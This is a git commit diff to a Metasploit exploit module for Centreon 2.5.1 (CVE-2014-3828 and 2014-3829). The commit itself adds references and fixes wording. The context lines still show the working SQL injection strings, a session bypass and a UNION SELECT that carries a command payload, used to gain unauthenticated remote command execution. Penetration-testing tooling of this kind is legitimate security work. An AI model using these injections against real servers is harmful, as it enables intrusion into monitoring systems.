Add references and fix typos

2014-10-17 15:29:28 -05:00 · 2014-10-17 15:29:28 -05:00 · d831a20629
parent 299d9afa6f
commit d831a20629
1 changed files with 10 additions and 7 deletions
--- a/modules/exploits/linux/http/centreon_sqli_exec.rb
+++ b/modules/exploits/linux/http/centreon_sqli_exec.rb
@ -16,21 +16,23 @@ class Metasploit3 < Msf::Exploit::Remote
      'Description'    => %q{
        This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
        Enterprise Server 2.2 and prior. The combination of both vulnerabilities, in the
-        displayServiceStatus.php component, allow to remote unauthenticated execution of
-        arbitrary commands. The module only requires a session available in the application
-        at the moment of exploitation. This module has been tested successfully on Centreon
-        Enterprise Server 2.2.
+        displayServiceStatus.php component, allows remote unauthenticated execution of arbitrary
+        commands. The module only requires a session available in the application at the moment
+        of exploitation. It means a legit ust must be logged in. This module has been tested
+        successfully on Centreon Enterprise Server 2.2.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
-          'Tom MaZ', # Vulnerability Discovery
+          'MaZ', # Vulnerability Discovery and Analysis
          'juan vazquez' # Metasploit Module
        ],
      'References'     =>
        [
          ['CVE', '2014-3828'],
-          ['CVE', '2014-3829']
+          ['CVE', '2014-3829'],
+          ['US-CERT-VU', '298796'],
+          ['URL', 'http://seclists.org/fulldisclosure/2014/Oct/78']
        ],
      'Arch'           => ARCH_CMD,
      'Platform'       => 'unix',
@ -84,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited")
    elsif check == Exploit::CheckCode::Detected
-      fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited or you just need to wait until someone logged in")
+      fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited, maybe you just need to wait until someone logs in")
    end

    print_status("#{peer} - Exploiting...")
@ -93,6 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
    session_injection = "#{random_id}' or '#{random_char}'='#{random_char}"
    template_injection = "' UNION ALL SELECT 1,2,3,4,5,CHAR(59,#{mysql_payload}59),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- /**"
    res = send_template_id(session_injection, template_injection)
+
    if res && res.body && res.body.to_s =~ /sh: --imgformat: command not found/
      vprint_status("Output: #{res.body}")
    end